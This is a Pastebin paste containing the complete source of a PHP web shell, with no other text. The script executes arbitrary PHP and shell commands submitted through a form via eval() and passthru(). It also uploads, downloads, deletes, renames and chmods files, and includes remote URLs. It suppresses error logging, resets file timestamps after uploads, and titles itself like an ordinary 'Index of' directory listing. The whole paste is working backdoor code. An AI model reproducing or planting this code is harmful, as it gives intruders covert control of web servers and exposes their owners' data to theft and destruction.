Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- @ini_set('max_execution_time',0);
- @ini_set('error_reporting','E_NOTICE');
- @ini_set('display_errors','Off');
- @ini_set('log_errors',0);
- if (function_exists("date_default_timezone_set")){date_default_timezone_set('Etc/GMT-9');}
- define('datedt', 9*3600-date('Z'));
- if(!isset($_POST) && isset($HTTP_POST_VARS)) { $_POST = $HTTP_POST_VARS; }
- if(!isset($_FILES) && isset($HTTP_POST_FILES)) { $_FILES = $HTTP_POST_FILES; }
- if(!isset($_SERVER) && isset($HTTP_SERVER_VARS)) { $_SERVER = $HTTP_SERVER_VARS; }
- if (get_magic_quotes_gpc()) {
- if (isset($_SERVER['REQUEST_METHOD']) && !strcmp($_SERVER['REQUEST_METHOD'],'POST')) {
- foreach ($_POST as $key => $val) {
- if (isset($val)) {
- $_POST[$key] = stripslashes($val);
- }
- }
- }
- }
- function hspecialchars($v) {
- return str_replace(array('&','<','>','"'),array('&','<','>','"'),$v);
- }
- $upfiletype = (isset($_FILES['upfile']['type'])) ? $_FILES['upfile']['type'] : '';
- $upfilesize = (isset($_FILES['upfile']['size'])) ? $_FILES['upfile']['size'] : '';
- $upfilename = (isset($_FILES['upfile']['name'])) ? $_FILES['upfile']['name'] : '';
- $upfile = (isset($_FILES['upfile']['tmp_name'])) ? $_FILES['upfile']['tmp_name'] : '';
- $r_method = isset($_SERVER['REQUEST_METHOD']) ? $_SERVER['REQUEST_METHOD'] : '';
- $q_string = isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '';
- $p_dir = isset($_POST['dir']) ? $_POST['dir'] : '';
- $p_ud_dir = isset($_POST['ud_dir']) ? 1 : 0;
- $p_ddir = isset($_POST['ddir']) ? $_POST['ddir'] : '';
- $p_m = isset($_POST['m']) ? $_POST['m'] : '';
- $p_f = isset($_POST['f']) ? $_POST['f'] : '';
- $p_ud_sfile = isset($_POST['ud_sfile']) ? 1 : 0;
- $p_ud_nfile = isset($_POST['ud_nfile']) ? 1 : 0;
- $p_ud_eval = isset($_POST['ud_eval']) ? 1 : 0;
- $p_e_pt = isset($_POST['e_pt']) ? 1 : 0;
- $p_selectfile = !empty($_POST['selectfile']) ? $_POST['selectfile'] : '';
- $p_newfile = '';
- if(!empty($_POST['newfile'])){$p_newfile=$_POST['newfile'];}
- elseif($upfilename != ""){$p_newfile=basename($_FILES['upfile']['name']);}
- $file = '';
- $newfile = '';
- $p_eval = isset($_POST['eval']) ? $_POST['eval'] : '';
- $p_e_disp = isset($_POST['e_disp']) ? $_POST['e_disp'] : '';
- $p_per = isset($_POST['per']) ? intval($_POST['per'] ,8) : '';
- $p_perm = isset($_POST['perm']) ? intval($_POST['perm'] ,8): '';
- $p_fseekoffset = isset($_POST['fseekoffset']) ? $_POST['fseekoffset'] : '';
- $p_fseekwhence = isset($_POST['fseekwhence']) ? $_POST['fseekwhence'] : '';
- $p_readdata = isset($_POST['p_readdata']) ? sprintf("%s", $_POST['p_readdata']) : 0;
- $p_vmax = isset($_POST['vmax']) ? $_POST['vmax'] : '';
- $p_order = isset($_POST['order']) ? $_POST['order'] : '';
- $p_sort = isset($_POST['sort']) ? $_POST['sort'] : '';
- $s_software = isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : '';
- $s_server_name = isset($_SERVER['SERVER_NAME']) ? $_SERVER['SERVER_NAME'] : '';
- $s_server_port = isset($_SERVER['SERVER_PORT']) ? $_SERVER['SERVER_PORT'] : '';
- if (!strcmp($r_method,'GET')) {
- $query = urldecode($q_string);
- $file = $query;
- }
- $dir = strcmp($p_dir,'') ? $p_dir : '';
- if ($p_ud_dir) { $dir = urldecode($dir); }
- $udddir = strcmp($p_ddir,'') ? urldecode($p_ddir) : '';
- if (strcmp($p_m,'')) {
- if ($p_ud_sfile && strcmp($p_selectfile,'')) { $p_selectfile = urldecode($p_selectfile); }
- if ($p_ud_nfile && strcmp($p_newfile,'')) { $p_newfile = urldecode($p_newfile); }
- if (strcmp($p_selectfile,'') && !strcmp($udddir,$dir)) {
- $file = $udddir . '/' . $p_selectfile;
- $newfile = $udddir . '/' . $p_newfile;
- } elseif (strcmp($p_selectfile,'') && strcmp($udddir,$dir)) {
- $file = $dir . '/' . $p_selectfile;
- $newfile = $dir . '/' . $p_newfile;
- } elseif (!strcmp($udddir,$dir)) {
- $file = $udddir . '/' . urldecode($p_f);
- $newfile = $udddir . '/' . $p_newfile ;
- } elseif (strcmp($udddir,$dir)) {
- $file = $dir . '/' . urldecode($p_f);
- $newfile = $dir . '/' . $p_newfile;
- }
- }
- if (strcmp($p_eval,'')) {
- if ($p_ud_eval) { $p_eval = urldecode($p_eval); }
- if (strcmp($p_e_disp,'')) { echo '<' . $p_e_disp . '>'; }
- if ($p_e_pt) {
- foreach (explode("\x0d\x0a", $p_eval) as $key) {
- eval(passthru($key));
- }
- } else { eval($p_eval); }
- if (strcmp($p_e_disp,'')) { echo '</' . $p_e_disp . '>'; }
- echo '<br>';
- }
- $limitb = 1024 * 1024 * 30;
- $message = "";
- if (strcmp($p_m,'') && !strcmp($p_m,'unlink_rmdir')) {
- if (is_dir($file)) {
- rmdir($file) or $message = "<b id=z>failed</b> ";
- $message .= "<b id=o>rmdir " . hspecialchars($file) . "</b>\x0a";
- } else {
- unlink($file) or $message = "<b id=z>failed</b> ";
- $message .= "<b id=o>unlink " . hspecialchars($file) . "</b>\x0a";
- }
- clearstatcache();
- } elseif (!strcmp($p_m,'chmod')) {
- chmod($file,$p_per) or $message = "<b id=z>failed</b> ";
- $message .= "<b id=p>chmod " . hspecialchars($file) . ',' . hspecialchars($p_per) . "</b>\x0a";
- } elseif (!strcmp($p_m,'upload')) {
- $mtime=@filemtime($newfile) or 0;
- if ($upfilesize > $limitb) { $message = "<b id=z>failed</b> "; }
- else { move_uploaded_file($upfile,$newfile) or $message = "<b id=z>failed</b> "; }
- $message .= "<b id=r>upload " . hspecialchars($upfilename) . ',' . hspecialchars($newfile) . "</b>\x0a";
- // eval(passthru('chmod 777 ' . $newfile));
- if($mtime){touch($newfile,$mtime,$mtime);}
- } elseif (!strcmp($p_m,'rename')) {
- rename($file,$newfile) or $message = "<b id=z>failed</b> ";
- $message .= "<b id=s>rename " . hspecialchars($file) . ',' . hspecialchars($newfile) . "</b>\x0a";
- } elseif (!strcmp($p_m,'mkdir')) {
- mkdir($newfile,$p_perm) or $message = "<b id=z>failed</b> ";
- $message .= "<b id=t>mkdir " . hspecialchars($newfile) . ',' . hspecialchars($p_perm) . "</b>\x0a";
- }
- if (strcmp($file,'') && is_readable($file) && is_file($file) && (!strcmp($p_m,'chdir_download') || !strcmp($file,$query))) {
- $readdata=0;
- $filename = preg_match("/([^\x2f\x5c]*)$/",$file,$matches) ? $matches[1] : basename($file);
- header("Content-Type: application/octet-stream");
- header("Content-Disposition: attachment; filename=\"" . $filename . "\"");
- $fp = fopen ("$file", 'rb');
- if (!strcmp($p_fseekoffset,'0') && !strcmp($p_fseekwhence,'0')) {
- header('Content-Length: ' . sprintf("%s", filesize($file)));
- } else {
- $fseekp = 0;
- if (!strcmp($p_fseekwhence,'0')) {
- $fseekp = $p_fseekoffset;
- } elseif (!strcmp($p_fseekwhence,'2')) {
- $fseekp = sprintf("%s", filesize($file) + $p_fseekoffset);
- }
- fseek ($fp,$fseekp);
- }
- do {
- $data = fread($fp, 4096);
- $lendata=strlen($data);
- if ($lendata == 0) { break; }
- $sasize = sprintf("%s", $readdata+$lendata-$p_readdata);
- if ($p_readdata && $sasize > 0) {
- $data = substr($data, 0, $lendata-$sasize);
- echo $data;
- break;
- }
- echo $data;
- } while(true);
- fclose ($fp);
- exit;
- } if (preg_match("#^[^:]+://.*$#",$file)) {
- include($file);
- exit;
- }
- echo <<<END
- <style>
- td{font-size:12px;}
- select,pre,form,input{display:inline;margin:0px;padding:0px;}
- a{text-decoration:none;}
- b{font-weight:normal;}
- #X{ime-mode:disabled;}
- #a{background:#ccffff}
- #b{background:#efefff}
- #c{background:#ffffcc}
- #d{background:#ccffcc}
- #e{background:#ccccff}
- #f{background:#ffcccc}
- #g{background:#cccccc}
- #o{width:100%;background:#fff6f6;color:red;border:1px solid #efe6e6;}
- #p{width:100%;background:#eff5ef;color:teal;border:1px solid #dfe5df;}
- #q{width:100%;background:#fff6ff;color:#ff1493;border:1px solid #efe6ef;}
- #r{width:100%;background:#f6fff6;color:green;border:1px solid #e6efe6;}
- #s{width:100%;background:#f0f0fc;color:blue;border:1px solid #e0e0ec;}
- #t{width:100%;background:#fffcf0;color:orange;border:1px solid #efece0;}
- #u{width:100%;background:#f6f6f6;color:gray;}
- #y{color:teal;}
- #z:hover{color:red;}
- #z:link{color:blue;}
- #z:visited{color:red;}
- #z:active{color:red;}
- </style>
- END;
- function permissions($perms) {
- $perms=floatval($perms);
- if (($perms & 0xC000) == 0xC000) {
- $info = 's';
- } elseif (($perms & 0xA000) == 0xA000) {
- $info = 'l';
- } elseif (($perms & 0x8000) == 0x8000) {
- $info = '-';
- } elseif (($perms & 0x6000) == 0x6000) {
- $info = 'b';
- } elseif (($perms & 0x4000) == 0x4000) {
- $info = 'd';
- } elseif (($perms & 0x2000) == 0x2000) {
- $info = 'c';
- } elseif (($perms & 0x1000) == 0x1000) {
- $info = 'p';
- } else {
- $info = 'u';
- }
- if($perms & 0x100){ $info .= 'r'; }
- else{ $info .= '-'; }
- if($perms & 0x80){ $info .= 'w'; }
- else{ $info .= '-'; }
- if($perms & 0x40){
- if($perms & 0x800){
- $info .= 's';
- }else{
- $info .= 'x';
- }
- }else{
- if($perms & 0x800){
- $info .= 'S';
- }else{
- $info .= '-';
- }
- }
- if($perms & 0x20){ $info .= 'r'; }
- else{ $info .= '-'; }
- if($perms & 0x10){ $info .= 'w'; }
- else{ $info .= '-'; }
- if($perms & 0x8){
- if($perms & 0x400){
- $info .= 's';
- }else{
- $info .= 'x';
- }
- }else{
- if($perms & 0x400){
- $info .= 'S';
- }else{
- $info .= '-';
- }
- }
- if($perms & 0x4){ $info .= 'r'; }
- else{ $info .= '-'; }
- if($perms & 0x2){ $info .= 'w'; }
- else{ $info .= '-'; }
- if($perms & 0x1){
- if($perms & 0x200){
- $info .= 't';
- }else{
- $info .= 'x';
- }
- }else{
- if($perms & 0x200){
- $info .= 'T';
- }else{
- $info .= '-';
- }
- }
- return $info;
- }
- function clengthset($v) {
- return strlen($v) > 64 ? '..' . substr($v,-62,62) : $v;
- }
- function getid($file) {
- if (!function_exists('posix_getpwuid')) { return fileowner($file).'/'.filegroup($file); }
- $arru = posix_getpwuid(fileowner($file));
- $arrg = posix_getgrgid(filegroup($file));
- $uid = strcmp($arru['uid'],'') ? $arru['uid'] : 0;
- $uname = strcmp($arru['name'],'') ? $arru['name'] : "";
- $gid = strcmp($arrg['gid'],'') ? $arrg['gid'] : 0;
- $gname = strcmp($arrg['name'],'') ? $arrg['name'] : "";
- return "$uid/$gid $uname/$gname";
- }
- $dir = is_dir($file) ? $file : $dir;
- $dir = is_dir($dir) ? $dir : $udddir;
- $dir = is_dir($dir) ? $dir : '.';
- $dir = realpath($dir);
- $c_ud_dir = '';
- if (preg_match("/[^\x20-\x7E]/",$dir)) { $p_ud_dir=1; }
- if ($p_ud_dir) { $dispdir = urlencode($dir); $dispdir2 = hspecialchars($dir); $c_ud_dir = ' checked'; }
- else { $dispdir = $dispdir2 = hspecialchars($dir); }
- $ddir = urlencode($dir);
- $vmax = preg_match("/^[0-9]+$/",$p_vmax) ? $p_vmax : 100;
- $order = preg_match("/^[0-9]+$/",$p_order) ? $p_order : 1;
- $sorts = !strcmp($p_sort,'sort') ? ' selected' : '';
- $rsorts = !strcmp($p_sort,'rsort') ? ' selected' : '';
- $natsorts = !strcmp($p_sort,'natsort') ? ' selected' : '';
- $c_sort_r = '';
- $p_sort_r = 0;
- if(isset($_POST['sort_r'])){
- $c_sort_r=' checked';
- $p_sort_r = 1;
- }
- echo <<<END
- <title>Index of $dispdir2</title><body bgcolor=white text=black link=black vlink=gray alink=gray><span id=b>$dispdir2</span><br><pre id=b>$message</pre><br><a href=#u name=tx>#under</a>
- <form action=? method=POST enctype="multipart/form-data"><input type=hidden name=MAX_FILE_SIZE value={$limitb}>
- <table frame=border border=1 bordercolor=blue bordercolordark=#666699 bordercolorlight=#9999ff bgcolor=#eeeeee cellspacing=0 cellpadding=1>
- END;
- $dirHandler = opendir($dir);
- while ($r=readdir($dirHandler)) { $files[] = $r; }
- if (!strcmp($p_sort,'sort')) { sort($files); }
- elseif (!strcmp($p_sort,'rsort')) { rsort($files); }
- elseif (!strcmp($p_sort,'natsort')) { natsort($files); }
- if($p_sort_r){$files=array_reverse($files);}
- $filen = sizeof($files);
- $starr = $order && $order-1 <= $filen-1 ? $order-1 : $filen-1;
- $enarr = $order-1+$vmax && $order-1+$vmax-1 <= $filen-1 ? $order-1+$vmax-1 : $filen-1;
- $starr++; $enarr++;
- echo "<tr><td id=a>file:{$filen}</td><td colspan=7>{$starr} to {$enarr}</td></tr>";
- $starr--; $enarr--;
- echo <<<END
- <tr>
- <td><input type=radio checked name=f value=""></td><td id=a>per</td><td id=b>name</td><td id=c>size</td><td id=d>ctime</td><td id=e>mtime</td><td id=f>atime</td><td id=g>uid/gid</td>
- </tr>
- END;
- $i=1;
- while($i <= $starr){++$i; next($files); }
- for ($i=0; $i<=$enarr-$starr; $i++) {
- $file = current($files);
- $ugid=getid("$dir/$file");
- if (preg_match("/^([0-9]+\/[0-9]+) ([^\n]*)$/",$ugid,$matches)) { $ugid=$matches[1]; $ugname = $matches[2]; }
- else { $ugname = ""; }
- echo "<tr><td>" . sprintf("%s",key($files)+1) . "<input type=radio name=f value=\"".urlencode($file)."\"></td><td id=";
- if (is_dir($dir."/".$file)) { echo "d>"; }
- else { echo "a>"; }
- echo permissions(fileperms($dir."/".$file));
- echo "</td><td id=b>";
- if (is_dir($dir."/".$file)) { echo "<a href=\"?" . urlencode(realpath("$dir/$file")) . "\" id=z><pre>" . hspecialchars(clengthset($file)) . "</pre></a>"; }
- else { echo "<a href=\"?" . urlencode(realpath("$dir/$file")) . "\"><pre>" . hspecialchars(clengthset($file)) . "</pre></a>"; }
- echo "</td><td id=c>" . sprintf("%s",filesize($dir."/".$file)) .
- "</td><td id=d>" . date("m/d/y H:i:s", filectime("$dir/$file")+datedt) .
- "</td><td id=e>" . date("m/d/y H:i:s", filemtime("$dir/$file")+datedt) .
- "</td><td id=f>" . date("m/d/y H:i:s", fileatime("$dir/$file")+datedt) .
- "</td><td id=g";
- if (strcmp($ugname,'')) { echo " title=\"" . hspecialchars($ugname) . "\""; }
- echo ">". hspecialchars($ugid) .
- "</td></tr>\x0a";
- next($files);
- }
- echo <<<END
- </table><a name=u href=#tx>#top</a>
- <pre id=u><b id=o><input type=radio name=m value=unlink_rmdir> unlink/rmdir</b>
- <b id=p><input type=radio name=m value=chmod> chmod (<input size=6 name=per value=0644 id=X>)</b>
- <b id=q><input type=radio name=m value=chdir_download checked> chdir/download (fseek offset<input size=12 name=fseekoffset value=0 id=X> whence<select name=fseekwhence><option value=0 selected>SEEK_SET<option value=2>SEEK_END</select>) length<input size=12 name=p_readdata value="0"></b>
- <b id=r><input type=radio name=m value=upload> upload</b>
- <b id=s><input type=radio name=m value=rename> rename</b>
- <b id=t><input type=radio name=m value=mkdir> mkdir (<input size=6 name=perm value=0755 id=X>)</b>
- fileview order <input id=X size=12 value={$order} name=order> viewmax <input id=X size=12 value={$vmax} name=vmax> sortType <select name=sort><option value=""><option value=sort{$sorts}>sort<option value=rsort{$rsorts}>rsort<option value=natsort{$natsorts}>natsort</select> reverce <input type=checkbox{$c_sort_r} name=sort_r value=1>
- dir <input size=100 name=dir value="{$dispdir}"> d_urldec. <input type=checkbox{$c_ud_dir} name=ud_dir value=1>
- selectfile <input size=100 name=selectfile value=""> s_urldec. <input type=checkbox name=ud_sfile value=1>
- newfile <input size=100 name=newfile value=""> n_urldec. <input type=checkbox name=ud_nfile value=1>
- upfile <input size=100 type=file name=upfile>
- eval <textarea rows=4 cols=70 name=eval></textarea> e_urldec. <input type=checkbox name=ud_eval value=1> <select name=e_disp><option value="">none<option value=xmp selected>xmp<option value=pre>pre</select> passthru <input type=checkbox checked name=e_pt value=1>
- <input type=submit> <input type=reset><input type=hidden name=ddir value="{$ddir}">
- </pre>
- </form>
- END;
- echo '<address>phpversion ' . hspecialchars(phpversion()) . '</address>';
- echo '<address>' . hspecialchars($s_software) . " " . hspecialchars($s_server_name) . " Port " . hspecialchars($s_server_port) . "</address>";
- exit;?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement